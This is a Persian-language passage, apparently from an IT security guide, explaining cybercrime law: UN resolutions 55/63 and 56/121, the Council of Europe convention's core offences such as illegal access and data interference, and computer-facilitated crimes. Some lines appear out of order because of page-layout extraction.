ﻧﻴﺰ ﺍﺯ ﺗﺤﻘﻴﻘﺎﺕ ﻣﻴﺪﺍﻧﻲ ﻧﺸﺄﺕ ﻣﻲﮔﻴﺮﺩ.
ﺷﺎﻳﺪ ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺑﺎﺷـﺪ
ﻛﻪ ﺑﻪ ﺍﻫﻤﻴﺖ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩﻩ ﺍﺳـﺖ .ﻣﺠﻤـﻊ
ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ ﻣﻠــﻞ ﺩﺭ ﺩﺳــﺎﻣﺒﺮ ۲۰۰۰ﻭ ﮊﺍﻧﻮﻳــﻪ ۲۰۰۲
ﻗﻄﻌﻨﺎﻣــﻪﻫــﺎﻱ ۵۵/۶۳ﻭ ۵۶/۱۲۱ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﻣﺒــﺎﺭﺯﻩ ﺑــﺎ
ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺍﺭﺗﺒـﺎﻃﻲ ﺑـﻪ ﺗـﺼﻮﻳﺐ
ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ .ﻗﻄﻌﻨﺎﻣﺔ ۵۵/۶۳ﺑﻴﺎﻥ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻛﺸﻮﺭﻫﺎ ﺑـﺮﺍﻱ
ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻥ ﭘﻨﺎﻫﮕـﺎﻩ ﺍﻣـﻦ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻴﻜﻪ ﻣﺮﺗﻜـﺐ ﺟـﺮﺍﺋﻢ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺗﺪﻭﻳﻦ ﻛﻨﻨﺪ .ﻋـﻼﻭﻩ ﺑـﺮ
ﺍﻳﻦ ﻗﻄﻌﻨﺎﻣﺔ ۵۵/۶۳ﻋﻨﻮﺍﻥ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﺟﻬـﺖ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ )ﺑـﺎ
ﻫﻤﻜﺎﺭﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﺒـﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ(
ﺍﻗﺪﺍﻣﺎﺕ ﻻﺯﻡ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ .ﭘﻴـﺸﻨﻬﺎﺩ ﻗﻄﻌﻨﺎﻣـﺔ ۵۵/۶۳ﻧﻴـﺰ
ﺁﻣﻮﺯﺵ ﻗﻮﺍﻧﻴﻦ ﺍﺟﺮﺍﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ.
ﺳﺮﭘﻴﭽﻲ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺿﻮﻋﺔ ﺟﺮﺍﺋﻢ
•
ﺩﺯﺩﻱ ﺩﺍﺩﻩﻫﺎ :٨٠ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺗﻌﻤـﺪﻱ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ ﺍﺯ
ﺩﺍﺩﻩﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺭﺍﻳﺎﻧﻪﺍﻱ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ
ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺷـﺨﺎﺹ ﺍﺷـﺎﺭﻩ
ﻛــﺮﺩ .ﺍﻳــﻦ ﻗــﻮﺍﻧﻴﻦ ﺑــﻪ ﻗــﺼﺪ ﺣﻔﺎﻇــﺖ ﺍﺯ ﻣﺤﺮﻣــﺎﻧﮕﻲ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﻬﻴﻪ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻣﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻳـﻦ
ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻈﺎﻣﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺩﻧﻴﺎ ،ﺭﺩﻳـﺎﺑﻲ
ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﻣﻜﺎﻟﻤﺎﺕ ﺗﻠﻔﻨﻲ ﺭﺍ ﺟـﺮﻡ ﻣـﻲ ﺩﺍﻧﻨـﺪ؛ ﻭ ﺍﻳـﻦ
ﻣﻔﻬﻮ ﹺﻡ ﺧﻮﺵﺗﻌﺮﻳﻒ ﺩﺭ ﺟﻬﺎﻥ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﻠﻔﻨﻲ ﻣﻲ ﺗﻮﺍﻧـﺪ
ﻛﺎﺭﻛﺮﺩ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
•
ﺗﺪﺍﺧﻞ ﺩﺍﺩﻩﻫﺎ :٨١ﺗﺨﺮﻳـﺐ ،ﺣـﺬﻑ ،ﻳـﺎ ﺗﻐﻴﻴـﺮ ﺗﻌﻤـﺪﻱ ﻭ
ﻼ ﺍﺭﺳــﺎﻝ
ﻏﻴﺮﻣﺠــﺎﺯ ﺩﺍﺩﻩﻫــﺎ ﺩﺭ ﺭﺍﻳﺎﻧــﺔ ﺩﻳﮕــﺮﺍﻥ .ﻣــﺜ ﹰ
•
ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ :٨٣ﺩﺳﺘﺮﺳﻲ ﺗﻌﻤﺪﻱ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑـﻪ
ﺳﻴــﺴﺘﻢ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺷﺨــﺼﻲ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﻓــﻀﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻣﺘﺮﺍﺩﻑ "ﺗﻌﺪﻱ" ﺩﺍﻧﺴﺖ) .ﺍﺯ ﻳﻚ
ﺩﻳﺪﮔﺎﻩ ﺩﻳﮕﺮ ،ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ،ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ
ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺗﻬﺪﻳﺪﻱ ﺑـﺮﺍﻱ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺩﺍﺩﻩﻫـﺎ
ﺍﺳﺖ( .ﺩﺭ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﻘـﻮﻗﻲ ﺗﻌﺮﻳـﻒ ﺩﺳﺘﺮﺳـﻲ
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ
ﻣﺤﺮﻣﺎﻧــﻪ )ﻣﺜــﻞ ﺍﻃﻼﻋــﺎﺕ ﭘﺰﺷــﻜﻲ ﻳــﺎ ﻣــﺎﻟﻲ( ﺩﺭﻳﺎﻓــﺖ،
ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻳﺎ ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﻧﺪ.
ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﻳﻚ ﻣﻌﺎﻫﺪﻩ ﺣﺎﻭﻱ ﻧﻜﺎﺕ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻣﻨﺘﺸﺮ ﻛـﺮﺩﻩ
ﺍﺳﺖ .ﺑﻨﺪﻫﺎﻱ ۲ﺗﺎ ۵ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺨﻠﻔـﺎﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﭼﻬﺎﺭ ﻣﻮﺭﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﺟﺮﺍﺋﻢ ﺍﺳﺎﺳـﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻧﺎﻡ ﻣﻲﺑﺮﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﺩﺭ ﺧـﻮﺩ ﻣﻌﺎﻫـﺪﻩ ﺑﻄـﻮﺭ
ﻣﻔﺼﻞ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﻧﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺭﺍ
ﺩﺭ ﺑﺮ ﮔﻴﺮﻧﺪ .ﺍﻳﻦ ﻣﻌﺎﻫﺪﻩ ﺩﺍﺭﺍﻱ ﮔﺰﺍﺭﺷﻲ ﺗﻮﺻﻴﻔﻲ ﺍﺳﺖ ﻛﻪ ﺑـﻪ
ﺗﻌﺒﻴﺮ ﺁﻥ ﻛﻤﻚ ﻣﻲﻛﻨﺪ .ﺑﻨﺪ ۲ﺍﻳﻦ ﻣﻌﺎﻫﺪﻩ ﺩﻭﻟﺘﻬﺎ ﺭﺍ ﺑﻪ ﻣﻘﺎﺑﻠـﻪ
ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ )ﺩﺳﺘﺮﺳﻲ ﺗﻌﻤﺪﻱ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺗﻤـﺎﻡ ﻳـﺎ ﺑﺨـﺸﻲ ﺍﺯ
ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ( ﻓﺮﺍ ﻣﻲﺧﻮﺍﻧﺪ .ﺩﺭ ﻇﺎﻫﺮ ،ﺍﻳﻦ ﻣﺎﺩﻩ ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﻛـﻪ
ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﺭﺳﺎﻝ ﻣﻲ ﻧﻤﺎﻳﻨﺪ ﻣﺠﺮﻡ ﻣﻲ ﺷـﻤﺎﺭﺩ،
78 Substantive Law
79 Procedural Law
Data Interception
Data Interference
80
81
System Interference
Illegal Access
82
83
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺑﺮﺍﻱ ﺍﺭﺗﻜﺎﺏ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﻣﺘـﺼﻮﺭ
ﺍﺳﺖ ،ﻭ ﺑﺮﺍﻱ ﻗﺎﻧﻮﻥﺷﻜﻨﻴﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﻧﻴـﺰ ﻧﺎﻣﻬـﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ
ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ،ﺍﻣــﺎ ﺩﺭ ﻣﺠﻤــﻮﻉ ،ﻗــﻮﺍﻧﻴﻨﻲ ﻛــﻪ ﺩﺭ ﻣــﻮﺭﺩ ﺟــﺮﺍﺋﻢ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﺴﺘﻨﺪ ﺩﺭ ﻳﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﺩﺳﺘﺔ ﺯﻳﺮ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ:
•
ﺗﺪﺍﺧﻞ ﺳﻴﺴﺘﻢ :٨٢ﺟﻠﻮﮔﻴﺮﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺳﻴـﺴﺘﻢ
ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺼﻮﺭﺕ ﺗﻌﻤــﺪﻱ ﺍﺯ ﻃﺮﻳــﻖ ﻭﺭﻭﺩ ،ﺍﻧﺘﻘــﺎﻝ،
ﺗﺨﺮﻳﺐ ،ﺣﺬﻑ ،ﻳﺎ ﺗﻐﻴﻴـﺮ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ .ﺍﻳـﻦ ﺑﻨـﺪ
ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺍﺯ ﻗﺒﻴﻞ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻳﺎ ﻭﺭﻭﺩ
ﻭﻳﺮﻭﺱ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﻛـﺎﺭﻛﺮﺩ ﻃﺒﻴﻌـﻲ
ﺁﻥ ﺗﺪﺍﺧﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺷﻮﺩ" .ﺁﺳﻴﺐ ﺟﺪﻱ" ﻋﻨـﺼﺮﻱ
ﺍﺳﺖ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ ﺭﺍ ﺍﺯ ﺭﻓﺘﺎﺭﻫـﺎﻱ ﻣﻌﻤـﻮﻟﻲ
ﻲ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺜﻞ ﺍﺭﺳـﺎﻝ ﻳـﻚ ﻳـﺎ ﭼﻨـﺪ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ
ﻧﺎﺧﻮﺍﺳﺘﻪ ﻣﺠﺰﺍ ﻣﻲﺳﺎﺯﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٤٨
ﭼﺮﺍﻛﻪ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﺑﺪﻭﻥ ﺍﺟﺎﺯﻩ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ )ﻭ ﻳـﺎ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ ﭘـﺴﺘﻲ ﮔﻴﺮﻧـﺪﻩ( ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﺍﺳـﺖ.
ﺑﺮﺍﺳﺎﺱ ﺍﻳﻦ ﺗﻔـﺴﻴﺮ ،ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﻭﺷﻦ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻣﻨﻈﻮﺭ ﺍﺯ "ﺑﺪﻭﻥ ﺍﺟـﺎﺯﻩ" ﻫﻤـﺎﻥ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻌﻤﻮﻝ ﻭ ﺫﺍﺗـﻲ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺳـﺖ ﻛـﻪ ﺑﻄـﻮﺭ ﺭﻭﺯﻣـﺮﻩ
ﻼ ﺍﺭﺳــﺎﻝ ﻧﺎﻣــﻪﻫــﺎﻱ
ﻫﻤــﻮﺍﺭﻩ ﺩﺭ ﺁﻥ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ؛ ﻣــﺜ ﹰ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻔﺤﺎﺕ ﻭﺏ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﻣﺴﺘﻘﻴﻢ ﻳﺎ ﻓﺮﺍﻣﺘﻦ ،٨٤ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ cookieﻫـﺎ ﻳـﺎ
botﻫﺎ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ.
ﺟﺮﺍﺋﻢ ﺗﺴﻬﻴﻞﺷﺪﻩ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ
ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻪﺗﻨﻬﺎ ﺷﺎﻣﻞ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻓﺮﺩ ﻣﺘﺨﻠـﻒ
ﺑﺮ ﻋﻠﻴﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ،ﺑﻠﻜﻪ ﺟﺮﺍﺋﻤﻲ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑـﺮ ﻣـﻲﮔﻴـﺮﺩ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ
ﺳﺮﻗﺖ ﻭ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺟﺮﺍﺋﻤﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ
ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺗﻤﺎﻣﻲ ﻧﻈﺎﻣﻬﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﺍﻣــﺎ ﺳــﺮﻗﺖ ﻭ ﻛﻼﻫﺒــﺮﺩﺍﺭﻱ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﻧﻴــﺰ ﺻــﻮﺭﺕ
ﻣﻲﮔﻴﺮﺩ .ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺗﺨﻠﻔﺎﺗﻲ ﻫﻤﭽﻮﻥ ﺳﺮﻗﺘﻬﺎﻱ ﺍﺩﺑـﻲ ﻭ
ﻓﻜﺮﻱ ﻳﺎ ﺍﻧﺘﺸﺎﺭ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ ﻧﻴﺰ ﻣﺤﺪﻭﺩ ﺑﻪ ﺟﺮﺍﺋﻢ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻤﻲﺷﻮﻧﺪ ،ﺑﻠﻜﻪ ﺗﺨﻠﻔﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ،ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﺟـﺮﺍﺋﻢ
ﻣﻮﺟﻮﺩ ،ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ .ﺗﺤﻠﻴـﻞ ﺩﻗﻴـﻖ
ﻋﻮﺍﻣﻞ ﻣﺨﺘﻠﻒ ﺍﻳﻨﮕﻮﻧﻪ ﺟﺮﺍﺋﻢ ﻣﺴﺘﻠﺰﻡ ﺑﺮﺭﺳﻲ ﺗﻄﺒﻴﻘﻲ ﻗـﻮﺍﻧﻴﻦ
ﺟﻨﺎﻳﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ ،ﻭ ﺩﺭ ﺍﻳـﻦ
ﺭﺍﺳﺘﺎ ﻗﺎﺋﻞ ﺷﺪﻥ ﺗﻔﺎﻭﺕ ﻣﻴﺎﻥ ﺗﺨﻠﻔﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺟﺮﺍﺋﻤﻲ ﻛـﻪ
ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﺿﺮﻭﺭﻱ ﻣﻲﺑﺎﺷﺪ.
ﺑﻨﺪﻫﺎﻱ ۷ﺗﺎ ۱۰ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺍﺯ ﺍﻳـﻦ ﻣﻔﻬـﻮﻡ ﻓﺎﺻـﻠﻪ
ﻣﻲﮔﻴﺮﺩ ﻭ ﺑﺼﻮﺭﺕ ﻛﻠﻲﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻤﻲ ﺻـﺤﺒﺖ ﻣـﻲﻛﻨـﺪ
ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻤﻨﻈﻮﺭ ﺗﺴﻬﻴﻞ ﺍﻧﺠﺎﻡ ﺁﻧﭽﻪ ﻛﻪ ﺧـﺎﺭﺝ
ﺍﺯ ﻓﻀﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﺟﺮﻡ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ ﻣـﻲﭘـﺮﺩﺍﺯﺩ )ﻛﺎﺭﻫـﺎﻳﻲ
ﭼﻮﻥ ﺟﻌﻞ ،ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ،ﺗﻮﺯﻳﻊ ،ﺗﻮﻟﻴﺪ ﻳﺎ ﺩﺍﺷﺘﻦ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ
ﻭ ﻧﻘﺾ ﺣﻘﻮﻕ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﻳﻚ ﺍﺛﺮ( .ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮﺧﻲ ﻧﻈﺎﻣﻬﺎﻱ
ﺣﻘﻮﻗﻲ ،ﺑﻜﺎﺭﮔﻴﺮﻱ ﺿﻮﺍﺑﻂ ﺧﺎﺹ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻤـﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ
ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻏﻴﺮﺿـﺮﻭﺭﻱ ﺑﺎﺷـﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺍﻳﻦ ﻗـﻮﺍﻧﻴﻦ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﻧـﻪﭼﻨـﺪﺍﻥ
Hypertext
84
ﻣﺘﻨﺎﺳﺐ ،ﺟﺮﺍﺋ ﹺﻢ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺑـﺪﺗﺮ ﺍﺯ ﺟـﺮﺍﺋﻢ
ﻣﺸﺎﺑﻪ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺟﻠﻮﻩ ﺩﻫﻨﺪ.
ﻛﺎﺭﺑﺮﺩ ﻣﻔﺎﻫﻴﻢ ﭘﺎﻳﻪﺍﻱ ﻗﺎﻧﻮﻥ ﺟﺰﺍ
ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻔﺎﻫﻴﻢ ﻣﻌﻤﻮﻝ ﺩﺭ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ
ﻣﺎﻧﻨـﺪ "ﻣﻌﺎﻭﻧــﺖ ﺩﺭ ﺟــﺮﻡ" ﻳــﺎ "ﻗـﺼﺪ" ﺭﺍ ﻧﻴــﺰ ﺩﺭ ﺣــﻮﺯﺓ ﺟــﺮﺍﺋﻢ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﻗـﺎﻧﻮﻥ
ﺟﺮﺍﺋﻢ ﻋﺎﺩﻱ ﻣﻔﻬﻮﻡ "ﻗﺼﺪ ﺗﺨﻠﻒ" ﺭﺍ ﺗﻌﺮﻳـﻒ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ ،ﺩﺭ
ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﻫﻤﺎﻥ ﻣﻔﻬﻮﻡ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﻗﺼﺪ ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺟﺮﻡ" ﻭ ﻳﺎ "ﻗﺼﺪ ﺍﻧﺠﺎﻡ ﺟﺮﻡ" ﻣﻄـﺮﺡ
ﺷﻮﺩ؛ ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻭﻳﺮﻭﺱ ﺑـﻪ ﺩﺭﺳـﺘﻲ ﻋﻤـﻞ ﻧﻜﻨـﺪ .ﺑـﻪ
ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻗﻮﺍﻧﻴﻦ ﻣﻔﻬﻮﻡ "ﻣﻌﺎﻭﻧـﺖ ﺩﺭ ﺟـﺮﻡ" ﺭﺍ
ﺗﻌﺮﻳﻒ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ،ﺩﺭ ﺣﻮﺯﻩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺍﺯ
ﻼ ﺍﮔـﺮ ﻛـﺴﻲ
